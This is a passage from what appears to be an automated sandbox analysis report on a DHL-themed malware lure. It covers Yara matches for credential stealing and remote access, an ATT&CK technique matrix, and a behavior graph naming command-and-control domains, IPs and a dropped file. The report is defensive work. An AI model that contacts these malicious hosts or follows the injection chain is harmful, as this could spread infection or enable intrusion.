              Source: msiexec.exe, 0000000A.00000002.3800682702.0000000008459000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: msiexec.exe, 0000000A.00000002.3800682702.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerSB
              Source: msiexec.exe, 0000000A.00000002.3800682702.00000000083E3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3800682702.0000000008459000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3800682702.0000000008420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: msiexec.exe, 0000000A.00000002.3800682702.0000000008420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager^
              Source: msiexec.exe, 0000000A.00000002.3800682702.0000000008459000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2025/03/07 12:41:48 Program Manager]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0000000A.00000002.3800682702.0000000008459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3300, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hsGaonspt.dat, type: DROPPED

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 0000000A.00000002.3800682702.0000000008459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3300, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hsGaonspt.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              1
              Scripting
              312
              Process Injection
              1
              Masquerading
              OS Credential Dumping1
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              1
              Registry Run Keys / Startup Folder
              1
              Registry Run Keys / Startup Folder
              1
              Modify Registry
              LSASS Memory2
              Process Discovery
              Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              31
              Virtualization/Sandbox Evasion
              Security Account Manager31
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
              Process Injection
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture113
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information
              LSA Secrets2
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing
              Cached Domain Credentials12
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632025 Sample: awb_post_dhl_delivery_docum... Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 35 ortain7histas4.duckdns.org 2->35 37 ortain7histas3.duckdns.org 2->37 39 3 other IPs or domains 2->39 45 Suricata IDS alerts for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Multi AV Scanner detection for submitted file 2->49 53 6 other signatures 2->53 9 powershell.exe 18 2->9         started        12 cmd.exe 1 2->12         started        signatures3 51 Uses dynamic DNS services 37->51 process4 signatures5 57 Early bird code injection technique detected 9->57 59 Writes to foreign memory regions 9->59 61 Found suspicious powershell code related to unpacking or dynamic code loading 9->61 63 Queues an APC in another process (thread injection) 9->63 14 msiexec.exe 6 8 9->14         started        18 conhost.exe 9->18         started        65 Suspicious powershell command line found 12->65 20 powershell.exe 14 22 12->20         started        23 conhost.exe 12->23         started        process6 dnsIp7 41 ortain7histas1.duckdns.org 192.169.69.26, 49697, 49698, 49699 WOWUS United States 14->41 33 C:\Users\user\AppData\Roaming\hsGaonspt.dat, data 14->33 dropped 25 cmd.exe 1 14->25         started        43 pendeliveryhl.com 172.67.218.131, 443, 49694, 49696 CLOUDFLARENETUS United States 20->43 55 Found suspicious powershell code related to unpacking or dynamic code loading 20->55 27 conhost.exe 20->27         started        file8 signatures9 process10 process11 29 conhost.exe 25->29         started        31 reg.exe 1 1 25->31         started       

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.